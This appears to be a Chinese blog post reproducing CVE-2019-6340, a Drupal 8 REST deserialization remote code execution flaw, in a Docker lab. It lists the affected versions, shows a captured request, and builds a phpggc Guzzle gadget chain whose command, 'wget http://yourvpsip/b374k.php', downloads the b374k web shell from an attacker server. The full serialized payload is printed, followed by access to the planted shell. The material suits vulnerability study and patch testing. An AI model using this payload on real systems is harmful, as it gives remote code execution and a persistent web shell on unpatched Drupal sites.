CVE-2019-6340复现

发表于

CVE-2019-6340

影响范围

  • Drupal 8.6.x < 8.6.10
  • Drupal 8.5.x < 8.5.11

影响条件

  • 站点启用了Drupal 8核心RESTful Web 服务(rest)模块,并允许PATCHPOST请求
  • 站点启用了另一个Web服务模块,如Drupal 8中的JSON:API,或Drupal 7中的ServicesRESTful Web Services

复现过程

Docker 拉下载环境

  • docker pull knqyf263/cve-2019-6340
  • docker run -d -p 80:80 knqyf263/cve-2019-6340

浏览器访问

1557232498512

Burp抓包

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
GET /node/1?_format=hal_json HTTP/1.1
Host: TARGET_IP
Content-Type: application/hal+json
Content-Length: 672
{
  "link": [
    {
      "value": "link",
      "options": 
    }
  ],
  "_links": {
    "type": {
      "href": "http://TARGET_IP/rest/type/shortcut/default"
    }
  }
}

1557232975424

构造exploit

  • git clone https://github.com/ambionics/phpggc.git

  • 构造下载大马的exp

    1
    ./phpggc guzzle/rce1 system "wget http://yourvpsip/b374k.php" -j
  • 1
    "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:36:\"wget http:\/\/yourvpsip\/b374k.php\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"

改包

1557233016300

浏览器访问

1
http://TARGET_IP/b374k.php

1557233129517

复现成功

参考

https://www.ambionics.io/blog/drupal8-rce

https://kylingit.com/blog/sa-core-2019-003-drupal-%E5%86%85%E6%A0%B8%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/

https://xz.aliyun.com/t/4213